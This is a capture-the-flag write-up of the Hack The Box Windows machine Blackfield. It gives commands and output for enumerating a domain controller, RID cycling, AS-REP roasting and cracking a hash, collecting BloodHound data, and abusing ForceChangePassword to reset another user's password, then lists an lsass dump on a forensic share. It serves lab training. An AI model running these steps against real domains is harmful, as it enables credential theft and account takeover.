# Blackfield

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Blackfield is a fun, insane-rated Windows machine created by [aas](https://app.hackthebox.com/users/6259).  
The foothold involves RID cycling and AS-REProasting, followed by `ForceChangePassword` DACL abuse and extracting credentials from lsass dump.  
Escalation to Administrator involves abusing the privileges of the `Backup Operators` group.

## Initial enumeration

```console
opcode@debian$ sudo nmap -v -p- --min-rate 2000 10.10.10.192

Nmap scan report for 10.10.10.192
Host is up (0.14s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
3268/tcp open  globalcatLDAP
5985/tcp open  wsman
```

```console
opcode@debian$ sudo nmap -sC -sV -p 53,88,135,139,389,445,593,3268,5985 -oN blackfield.nmap 10.10.10.192

Nmap scan report for 10.10.10.192
Host is up (0.17s latency).

PORT     STATE    SERVICE       VERSION
53/tcp   open     domain        Simple DNS Plus
88/tcp   open     kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-28 22:13:30Z)
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  filtered netbios-ssn
389/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open     microsoft-ds?
593/tcp  open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-28T22:13:46
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: 7h00m01s
```

DNS, Kerberos, SMB, RPC, LDAP, WinRM, and other ports suggest it is a Domain Controller.  
We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.192 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=BLACKFIELD,DC=local
ldapServiceName: BLACKFIELD.local:dc01$@BLACKFIELD.LOCAL
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=BLACKFIELD,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: DC=BLACKFIELD,DC=local
namingContexts: CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local
namingContexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local
isSynchronized: TRUE
highestCommittedUSN: 237658
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=BLACKFIELD,DC=local
dnsHostName: DC01.BLACKFIELD.local
defaultNamingContext: DC=BLACKFIELD,DC=local
currentTime: 20250228221355.0Z
configurationNamingContext: CN=Configuration,DC=BLACKFIELD,DC=local
```

Since the `dnsHostName` is set to the FQDN `DC01.BLACKFIELD.local`, we can add it to `/etc/hosts`.  

```text
10.10.10.192 DC01.BLACKFIELD.local BLACKFIELD.local DC01
```

## SMB enumeration

I prefer [NetExec](https://github.com/Pennyw0rth/NetExec) to enumerate SMB:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@e3affd1de9c1:~# echo '10.10.10.192 DC01.BLACKFIELD.local BLACKFIELD.local DC01' >> /etc/hosts
```

Null sessions are disabled:

```console
root@e3affd1de9c1:~# nxc smb 10.10.10.192 -d BLACKFIELD.local -u '' -p '' --shares
SMB         10.10.10.192  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192  445    DC01             [+] BLACKFIELD.local\: 
SMB         10.10.10.192  445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

However, guest sessions are enabled:

```console
root@e3affd1de9c1:~# nxc smb 10.10.10.192 -d BLACKFIELD.local -u 'opcode' -p '' --shares
SMB         10.10.10.192  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192  445    DC01             [+] BLACKFIELD.local\opcode: (Guest)
SMB         10.10.10.192  445    DC01             [*] Enumerated shares
SMB         10.10.10.192  445    DC01             Share           Permissions     Remark
SMB         10.10.10.192  445    DC01             -----           -----------     ------
SMB         10.10.10.192  445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192  445    DC01             C$                              Default share
SMB         10.10.10.192  445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192  445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192  445    DC01             NETLOGON                        Logon server share 
SMB         10.10.10.192  445    DC01             profiles$       READ            
SMB         10.10.10.192  445    DC01             SYSVOL                          Logon server share 
```

RID cycling can be performed:

```console
root@e3affd1de9c1:~# nxc smb 10.10.10.192 -d BLACKFIELD.local -u 'opcode' -p '' --rid-brute 10000
SMB         10.10.10.192  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192  445    DC01             [+] BLACKFIELD.local\opcode: (Guest)
SMB         10.10.10.192  445    DC01             498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.10.192  445    DC01             500: BLACKFIELD\Administrator (SidTypeUser)
SMB         10.10.10.192  445    DC01             501: BLACKFIELD\Guest (SidTypeUser)
SMB         10.10.10.192  445    DC01             502: BLACKFIELD\krbtgt (SidTypeUser)
SMB         10.10.10.192  445    DC01             512: BLACKFIELD\Domain Admins (SidTypeGroup)
SMB         10.10.10.192  445    DC01             513: BLACKFIELD\Domain Users (SidTypeGroup)
SMB         10.10.10.192  445    DC01             514: BLACKFIELD\Domain Guests (SidTypeGroup)
SMB         10.10.10.192  445    DC01             515: BLACKFIELD\Domain Computers (SidTypeGroup)
SMB         10.10.10.192  445    DC01             516: BLACKFIELD\Domain Controllers (SidTypeGroup)
SMB         10.10.10.192  445    DC01             517: BLACKFIELD\Cert Publishers (SidTypeAlias)
SMB         10.10.10.192  445    DC01             518: BLACKFIELD\Schema Admins (SidTypeGroup)
SMB         10.10.10.192  445    DC01             519: BLACKFIELD\Enterprise Admins (SidTypeGroup)
SMB         10.10.10.192  445    DC01             520: BLACKFIELD\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.10.192  445    DC01             521: BLACKFIELD\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.10.192  445    DC01             522: BLACKFIELD\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.10.192  445    DC01             525: BLACKFIELD\Protected Users (SidTypeGroup)
SMB         10.10.10.192  445    DC01             526: BLACKFIELD\Key Admins (SidTypeGroup)
SMB         10.10.10.192  445    DC01             527: BLACKFIELD\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.10.192  445    DC01             553: BLACKFIELD\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.10.192  445    DC01             571: BLACKFIELD\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.10.192  445    DC01             572: BLACKFIELD\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.10.192  445    DC01             1000: BLACKFIELD\DC01$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1101: BLACKFIELD\DnsAdmins (SidTypeAlias)
SMB         10.10.10.192  445    DC01             1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.10.192  445    DC01             1103: BLACKFIELD\audit2020 (SidTypeUser)
SMB         10.10.10.192  445    DC01             1104: BLACKFIELD\support (SidTypeUser)
SMB         10.10.10.192  445    DC01             1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
SMB         10.10.10.192  445    DC01             1106: BLACKFIELD\BLACKFIELD538365 (SidTypeUser)
SMB         10.10.10.192  445    DC01             1107: BLACKFIELD\BLACKFIELD189208 (SidTypeUser)
SMB         10.10.10.192  445    DC01             1108: BLACKFIELD\BLACKFIELD404458 (SidTypeUser)
[--SNIP--]
SMB         10.10.10.192  445    DC01             1410: BLACKFIELD\BLACKFIELD996878 (SidTypeUser)
SMB         10.10.10.192  445    DC01             1411: BLACKFIELD\BLACKFIELD653097 (SidTypeUser)
SMB         10.10.10.192  445    DC01             1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)
SMB         10.10.10.192  445    DC01             1413: BLACKFIELD\svc_backup (SidTypeUser)
SMB         10.10.10.192  445    DC01             1414: BLACKFIELD\lydericlefebvre (SidTypeUser)
SMB         10.10.10.192  445    DC01             1415: BLACKFIELD\PC01$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1416: BLACKFIELD\PC02$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1417: BLACKFIELD\PC03$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1418: BLACKFIELD\PC04$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1419: BLACKFIELD\PC05$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1420: BLACKFIELD\PC06$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1421: BLACKFIELD\PC07$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1422: BLACKFIELD\PC08$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1423: BLACKFIELD\PC09$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1424: BLACKFIELD\PC10$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1425: BLACKFIELD\PC11$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1426: BLACKFIELD\PC12$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1427: BLACKFIELD\PC13$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)
SMB         10.10.10.192  445    DC01             1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)
```

There are several dummy users and machines.  
[impacket](https://github.com/fortra/impacket)'s `smbclient.py` can be used to check the `profiles$` share:

```console
opcode@debian$ smbclient.py BLACKFIELD.local/opcode@DC01.BLACKFIELD.local -no-pass
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use profiles$
# ls
drw-rw-rw-          0  Wed Jun  3 12:47:12 2020 .
drw-rw-rw-          0  Wed Jun  3 12:47:12 2020 ..
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AAlleni
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABarteski
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABekesz
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABenzies
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABiemiller
[--SNIP--]
drw-rw-rw-          0  Wed Jun  3 12:47:12 2020 ZMiick
drw-rw-rw-          0  Wed Jun  3 12:47:12 2020 ZScozzari
drw-rw-rw-          0  Wed Jun  3 12:47:12 2020 ZTimofeeff
drw-rw-rw-          0  Wed Jun  3 12:47:12 2020 ZWausik
```

The `mget` implementation in `smbclient.py` is not reliable enough. I switched to `smbclient`:

```console
opcode@debian$ smbclient //BLACKFIELD.local/profiles$ -U 'opcode' -N              
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
```

All the directories were empty:

```console
opcode@debian$ lsd --tree
 .
├──  AAlleni
├──  ABarteski
├──  ABekesz
├──  ABenzies
├──  ABiemiller
[--SNIP--]
```

## AS-REProasting

Looking back at the usernames obtained via RID cycling, only `audit2020`, `support`, `svc_backup`, and `lydericlefebvre` seem legitimate users; the rest are dummies.  
We can use those usernames to roast AS-REPs:

```console
opcode@debian$ echo -e 'audit2020\nsupport\nsvc_backup\nlydericlefebvre' > usernames.txt
opcode@debian$ GetNPUsers.py BLACKFIELD.local/ -usersfile usernames.txt
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:5a12300cf7e2bfa3f3bfaccaba6ec5ac$36e64e942269536d69c369fed1bdcacb812bacdf26df06668d2a14aa52f2179451557753853ce59a05f59f443c5eb6f95deb7badba0fbe7bee4eb8683e21d4ea66c1c98a29a3a16215f434c0753254ffb94a68fcf0a4016a9eb57329e37ae61798ba2ed46030ab65926a8fdecf94d41fd30ad86abeda8dbcee5d8a7c0919c3943775d54a1f04a59b850514571bd962426aafc24578ae69cb48633899965d40abdb9d605e570e95a5ffcb47aa926486175f882bf7b706e649c2ecadfa8d43f54bc0c0e927fc020a5eaee0d5e991f25cd133fe4609eeb6e9c57aa9616c9419a23ef51f76c2432d12f56172c1fed1d4b8ddf7115ec6
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lydericlefebvre doesn't have UF_DONT_REQUIRE_PREAUTH set
```

The user `support` has kerberos preauthentication disabled.  
Crack the hash with `john`:

```console
opcode@debian$ john/john --wordlist=/home/opcode/CTF/wordlists/rockyou.txt hash
```

It cracks to `#00^BlackKnight`.

## Post-credential AD enumeration

SMB shares:

```console
root@e3affd1de9c1:~# nxc smb 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' --shares
SMB         10.10.10.192  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192  445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         10.10.10.192  445    DC01             [*] Enumerated shares
SMB         10.10.10.192  445    DC01             Share           Permissions     Remark
SMB         10.10.10.192  445    DC01             -----           -----------     ------
SMB         10.10.10.192  445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192  445    DC01             C$                              Default share
SMB         10.10.10.192  445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192  445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192  445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192  445    DC01             profiles$       READ            
SMB         10.10.10.192  445    DC01             SYSVOL          READ            Logon server share 
```

Some NetExec modules:

```console
root@e3affd1de9c1:~# nxc smb 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M enum_av
SMB         10.10.10.192  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192  445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
ENUM_AV     10.10.10.192  445    DC01             Found Windows Defender INSTALLED

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M adcs
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
ADCS        10.10.10.192  389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M maq
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
MAQ         10.10.10.192  389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.10.192  389    DC01             MachineAccountQuota: 10

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' --password-not-required
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
LDAP        10.10.10.192  389    DC01             User: PC01$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC02$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC03$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC04$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC05$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC06$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC07$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC08$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC09$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC10$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC11$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC12$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: PC13$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: SRV-WEB$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: SRV-FILE$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: SRV-EXCHANGE$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: SRV-INTRANET$ Status: enabled
LDAP        10.10.10.192  389    DC01             User: Guest Status: enabled

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' --trusted-for-delegation
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
LDAP        10.10.10.192  389    DC01             DC01$

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M enum_trusts
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
ENUM_TRUSTS 10.10.10.192  389    DC01             [*] No trust relationships found

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M get-desc-users
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
GET-DESC... 10.10.10.192  389    DC01             [+] Found following users: 
GET-DESC... 10.10.10.192  389    DC01             User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.10.192  389    DC01             User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.10.192  389    DC01             User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.10.10.192  389    DC01             User: lydericlefebvre description: @lydericlefebvre - VM Creator

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M whoami
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
WHOAMI      10.10.10.192  389    DC01             distinguishedName: CN=support,CN=Users,DC=BLACKFIELD,DC=local
WHOAMI      10.10.10.192  389    DC01             name: support
WHOAMI      10.10.10.192  389    DC01             Last logon: 133852565074350416
WHOAMI      10.10.10.192  389    DC01             pwdLastSet: 132269540038517340
WHOAMI      10.10.10.192  389    DC01             logonCount: 9
WHOAMI      10.10.10.192  389    DC01             sAMAccountName: support
```

I think all those machine accounts are pre-created computer accounts.  
And some groups:

```console
root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M group-mem -o group='Remote Management Users'
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
GROUP-MEM   10.10.10.192  389    DC01             [+] Found the following members of the Remote Management Users group:
GROUP-MEM   10.10.10.192  389    DC01             svc_backup

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M group-mem -o group='Remote Desktop Users'
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M group-mem -o group='Administrators'
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
GROUP-MEM   10.10.10.192  389    DC01             [+] Found the following members of the Administrators group:
GROUP-MEM   10.10.10.192  389    DC01             Administrator
GROUP-MEM   10.10.10.192  389    DC01             Enterprise Admins
GROUP-MEM   10.10.10.192  389    DC01             Domain Admins

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M group-mem -o group='Protected Users'
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 

root@e3affd1de9c1:~# nxc ldap 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -M group-mem -o group='Domain Computers'
LDAP        10.10.10.192  389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP        10.10.10.192  389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
GROUP-MEM   10.10.10.192  389    DC01             [+] Found the following members of the Domain Computers group:
GROUP-MEM   10.10.10.192  389    DC01             PC01$
GROUP-MEM   10.10.10.192  389    DC01             PC02$
GROUP-MEM   10.10.10.192  389    DC01             PC03$
GROUP-MEM   10.10.10.192  389    DC01             PC04$
GROUP-MEM   10.10.10.192  389    DC01             PC05$
GROUP-MEM   10.10.10.192  389    DC01             PC06$
GROUP-MEM   10.10.10.192  389    DC01             PC07$
GROUP-MEM   10.10.10.192  389    DC01             PC08$
GROUP-MEM   10.10.10.192  389    DC01             PC09$
GROUP-MEM   10.10.10.192  389    DC01             PC10$
GROUP-MEM   10.10.10.192  389    DC01             PC11$
GROUP-MEM   10.10.10.192  389    DC01             PC12$
GROUP-MEM   10.10.10.192  389    DC01             PC13$
GROUP-MEM   10.10.10.192  389    DC01             SRV-WEB$
GROUP-MEM   10.10.10.192  389    DC01             SRV-FILE$
GROUP-MEM   10.10.10.192  389    DC01             SRV-EXCHANGE$
GROUP-MEM   10.10.10.192  389    DC01             SRV-INTRANET$
```

`svc_backup` belongs to the `Remote Management Users` group.

I also used [BloodyAD](https://github.com/CravateRouge/bloodyAD) to look for DACL abuse:

```console
opcode@debian$ bloodyAD --host 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=BLACKFIELD,DC=local
permission: WRITE

distinguishedName: CN=support,CN=Users,DC=BLACKFIELD,DC=local
permission: WRITE
```

Nothing here either.  
We can also collect BloodHound data using [BloodHound.py](https://github.com/dirkjanm/BloodHound.py)  

```console
opcode@debian$ sudo ntpdate BLACKFIELD.local
opcode@debian$ bloodhound-python -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -c All --zip
```

In Bloodhound-CE, I found an edge from the user `support`:

![1](images/1.png)

User `support` can force change the password for `audit2020`.
BloodyAD can be used to change the password:

```console
opcode@debian$ bloodyAD --host 10.10.10.192 -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' set password audit2020 Opcode@123!
[+] Password changed successfully!
```

There were no edges in BloodHound from the user `audit2020`  
BloodyAD could not find anything either:

```console
opcode@debian$ bloodyAD --host 10.10.10.192 -d BLACKFIELD.local -u 'audit2020' -p 'Opcode@123!' get writable 

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=BLACKFIELD,DC=local
permission: WRITE

distinguishedName: CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local
permission: WRITE
```

Recall that we had another non-default share:

```console
root@e3affd1de9c1:~# nxc smb 10.10.10.192 -d BLACKFIELD.local -u 'audit2020' -p 'Opcode@123!' --shares
SMB         10.10.10.192  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192  445    DC01             [+] BLACKFIELD.local\audit2020:Opcode@123!
SMB         10.10.10.192  445    DC01             [*] Enumerated shares
SMB         10.10.10.192  445    DC01             Share           Permissions     Remark
SMB         10.10.10.192  445    DC01             -----           -----------     ------
SMB         10.10.10.192  445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192  445    DC01             C$                              Default share
SMB         10.10.10.192  445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192  445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192  445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.10.192  445    DC01             profiles$       READ        
SMB         10.10.10.192  445    DC01             SYSVOL          READ            Logon server share
```

Let us have a look at the `forensic` share:

```console
opcode@debian$ smbclient.py BLACKFIELD.local/audit2020:'Opcode@123!'@DC01.BLACKFIELD.local
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use forensic
# ls
drw-rw-rw-          0  Sun Feb 23 10:10:16 2020 .
drw-rw-rw-          0  Sun Feb 23 10:10:16 2020 ..
drw-rw-rw-          0  Sun Feb 23 13:14:37 2020 commands_output
drw-rw-rw-          0  Thu May 28 16:29:24 2020 memory_analysis
drw-rw-rw-          0  Fri Feb 28 17:30:34 2020 tools
# cd commands_output
# ls
drw-rw-rw-          0  Sun Feb 23 13:14:37 2020 .
drw-rw-rw-          0  Sun Feb 23 13:14:37 2020 ..
-rw-rw-rw-        528  Sun Feb 23 13:12:54 2020 domain_admins.txt
-rw-rw-rw-        962  Sun Feb 23 13:12:54 2020 domain_groups.txt
-rw-rw-rw-      16454  Fri Feb 28 17:32:17 2020 domain_users.txt
-rw-rw-rw-     518202  Sun Feb 23 13:12:54 2020 firewall_rules.txt
-rw-rw-rw-       1782  Sun Feb 23 13:12:54 2020 ipconfig.txt
-rw-rw-rw-       3842  Sun Feb 23 13:12:54 2020 netstat.txt
-rw-rw-rw-       3976  Sun Feb 23 13:12:54 2020 route.txt
-rw-rw-rw-       4550  Sun Feb 23 13:12:54 2020 systeminfo.txt
-rw-rw-rw-       9990  Sun Feb 23 13:12:54 2020 tasklist.txt
# cd ../memory_analysis
# ls
drw-rw-rw-          0  Thu May 28 16:29:24 2020 .
drw-rw-rw-          0  Thu May 28 16:29:24 2020 ..
-rw-rw-rw-   37876530  Thu May 28 16:29:24 2020 conhost.zip
-rw-rw-rw-   24962333  Thu May 28 16:29:24 2020 ctfmon.zip
-rw-rw-rw-   23993305  Thu May 28 16:29:24 2020 dfsrs.zip
-rw-rw-rw-   18366396  Thu May 28 16:29:24 2020 dllhost.zip
-rw-rw-rw-    8810157  Thu May 28 16:29:24 2020 ismserv.zip
-rw-rw-rw-   41936098  Thu May 28 16:29:24 2020 lsass.zip
-rw-rw-rw-   64288607  Thu May 28 16:29:24 2020 mmc.zip
-rw-rw-rw-   13332174  Thu May 28 16:29:24 2020 RuntimeBroker.zip
-rw-rw-rw-  131983313  Thu May 28 16:29:24 2020 ServerManager.zip
-rw-rw-rw-   33141744  Thu May 28 16:29:24 2020 sihost.zip
-rw-rw-rw-   33756344  Thu May 28 16:29:24 2020 smartscreen.zip
-rw-rw-rw-   14408833  Thu May 28 16:29:24 2020 svchost.zip
-rw-rw-rw-   34631412  Thu May 28 16:29:24 2020 taskhostw.zip
-rw-rw-rw-   14255089  Thu May 28 16:29:24 2020 winlogon.zip
-rw-rw-rw-    4067425  Thu May 28 16:29:24 2020 wlms.zip
-rw-rw-rw-   18303252  Thu May 28 16:29:24 2020 WmiPrvSE.zip
# cd ../tools
# ls
drw-rw-rw-          0  Fri Feb 28 17:30:34 2020 .
drw-rw-rw-          0  Fri Feb 28 17:30:34 2020 ..
drw-rw-rw-          0  Fri Feb 28 17:30:34 2020 sleuthkit-4.8.0-win32
drw-rw-rw-          0  Fri Feb 28 17:30:35 2020 sysinternals
drw-rw-rw-          0  Fri Feb 28 17:30:35 2020 volatility
```

